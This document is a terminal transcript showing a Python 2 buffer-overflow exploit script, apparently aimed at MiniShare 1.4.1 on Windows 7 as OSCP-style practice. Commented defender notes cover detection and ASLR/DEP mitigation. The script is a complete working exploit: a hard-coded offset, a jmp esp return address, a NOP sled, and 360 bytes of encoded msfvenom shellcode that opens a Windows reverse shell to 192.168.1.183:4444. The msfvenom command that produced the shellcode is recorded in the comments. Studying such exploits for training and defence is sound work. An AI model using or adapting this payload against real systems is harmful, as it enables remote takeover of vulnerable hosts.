c@kali:~/src/$ cat minishare141-win7ultip0c-2.py
#!/usr/bin/env python
# Proof-of-concept stack-overflow trigger against a small web file-sharing
# service (the transcript filename names MiniShare 1.4.1 on Windows 7; the
# code itself does not identify the product).  Python 2 only: the `print`
# statement below is a syntax error on Python 3, and the "\x.." literals are
# raw bytes only because Python 2's str is a byte string.
#
# End to end: open a TCP connection to <target>:80, send one HTTP request
# whose request-target is ~2.2 KB of attacker-controlled bytes (1787 filler
# + 4-byte return address + 26-byte NOP sled + 360-byte encoded payload),
# then close without reading a response.
#
# Defender notes:
#   - Detection: a GET request line of roughly 2,200 bytes whose target does
#     not start with "/" and contains non-printable bytes and a run of 0x90
#     is a strong signature for this class of overflow.
#   - Mitigation: the hard-coded return address (ret_addr) only works while
#     the module it points into loads at a fixed base, i.e. without ASLR;
#     with DEP the stack-resident payload would not execute even if the
#     overwrite lands.  The durable fix is not exposing the vulnerable
#     server version at all.
import sys, socket
# Usage: python mini-poc.py <target-host>.  There is no argument-count
# check, so a missing argument raises IndexError here.
target = sys.argv[1]
port = 80
print '[+] checking:', target  # Python 2 print statement
# Raw TCP socket rather than an HTTP client library, so the non-printable
# bytes assembled below go out verbatim.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
#shellcode = ""
buffer = "GET "  # NOTE(review): shadows the Python 2 builtin `buffer`
padding = "A" * 1787 # [*] Exact match at offset 1787 -- filler up to the saved return address
# Little-endian encoding of 0x7758e871.  The original comment says it was
# picked as a "jmp esp" location in a loaded module; the module is not
# recorded here, so the value is tied to one specific OS/library build.
ret_addr = "\x71\xe8\x58\x77" # search for jmpesp in modules
nopsss = "\x90" * 26  # NOP sled that the jmp esp is expected to land in
# Payload generated out of band with msfvenom (command recorded below); the
# bytes are opaque here.  -b lists 0x00/0x0a/0x0d as excluded bytes --
# presumably because a NUL or line ending would cut the request line short.
# Final size 360 bytes, matching the 24 x 15-byte lines that follow.
# c@kali:~/src/oscp$ msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.183
# LPORT=4444 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
# x86/shikata_ga_nai chosen with final size 360
# Payload size: 360 bytes
shellcode = ""
shellcode += "\xd9\xc5\xbd\x4d\x99\xdc\x16\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
shellcode += "\x54\x83\xea\xfc\x31\x6a\x14\x03\x6a\x59\x7b\x29\xea\x89\xf9"
shellcode += "\xd2\x13\x49\x9e\x5b\xf6\x78\x9e\x38\x72\x2a\x2e\x4a\xd6\xc6"
shellcode += "\xc5\x1e\xc3\x5d\xab\xb6\xe4\xd6\x06\xe1\xcb\xe7\x3b\xd1\x4a"
shellcode += "\x6b\x46\x06\xad\x52\x89\x5b\xac\x93\xf4\x96\xfc\x4c\x72\x04"
shellcode += "\x11\xf9\xce\x95\x9a\xb1\xdf\x9d\x7f\x01\xe1\x8c\xd1\x1a\xb8"
shellcode += "\x0e\xd3\xcf\xb0\x06\xcb\x0c\xfc\xd1\x60\xe6\x8a\xe3\xa0\x37"
shellcode += "\x72\x4f\x8d\xf8\x81\x91\xc9\x3e\x7a\xe4\x23\x3d\x07\xff\xf7"
shellcode += "\x3c\xd3\x8a\xe3\xe6\x90\x2d\xc8\x17\x74\xab\x9b\x1b\x31\xbf"
shellcode += "\xc4\x3f\xc4\x6c\x7f\x3b\x4d\x93\x50\xca\x15\xb0\x74\x97\xce"
shellcode += "\xd9\x2d\x7d\xa0\xe6\x2e\xde\x1d\x43\x24\xf2\x4a\xfe\x67\x9a"
shellcode += "\xbf\x33\x98\x5a\xa8\x44\xeb\x68\x77\xff\x63\xc0\xf0\xd9\x74"
shellcode += "\x27\x2b\x9d\xeb\xd6\xd4\xde\x22\x1c\x80\x8e\x5c\xb5\xa9\x44"
shellcode += "\x9d\x3a\x7c\xf0\x97\xac\xbf\xad\xa9\x9b\x28\xac\xa9\xf2\xf4"
shellcode += "\x39\x4f\xa4\x54\x6a\xc0\x04\x05\xca\xb0\xec\x4f\xc5\xef\x0c"
shellcode += "\x70\x0f\x98\xa6\x9f\xe6\xf0\x5e\x39\xa3\x8b\xff\xc6\x79\xf6"
shellcode += "\x3f\x4c\x88\x06\xf1\xa5\xf9\x14\xe5\xd7\x01\xe5\xf5\x7d\x02"
shellcode += "\x8f\xf1\xd7\x55\x27\xfb\x0e\x91\xe8\x04\x65\xa1\xef\xfa\xf8"
shellcode += "\x90\x84\xcc\x6e\x9d\xf2\x30\x7f\x1d\x03\x66\x15\x1d\x6b\xde"
shellcode += "\x4d\x4e\x8e\x21\x58\xe2\x03\xb7\x63\x53\xf7\x10\x0c\x59\x2e"
shellcode += "\x56\x93\xa2\x05\xe5\xd4\x5d\xdb\xcb\x7c\x36\x23\x4b\x7d\xc6"
shellcode += "\x49\x4b\x2d\xae\x86\x64\xc2\x1e\x66\xaf\x8b\x36\xed\x21\x79"
shellcode += "\xa6\xf2\x68\xdf\x76\xf2\x9e\xc4\x6f\x7d\x61\xfb\x8f\x7f\x5e"
shellcode += "\x2d\xb6\xf5\xa7\xed\x8d\x06\x92\x50\xa7\x8c\xdc\xc7\xb7\x84";  # trailing ';' is a no-op in Python
endreq = " HTTP/1.1\r\n\r\n"
# Request line layout: "GET " + filler + ret_addr + NOP sled + payload +
# " HTTP/1.1\r\n\r\n"  (4 + 1787 + 4 + 26 + 360 + 13 = 2194 bytes).
payload = buffer + padding + ret_addr + nopsss + shellcode + endreq
# Single send, then close.  Nothing is read back, so the script cannot tell
# whether the service crashed, rejected the request, or did anything at all.
s.send(payload)
s.close()
c@kali:~/src/$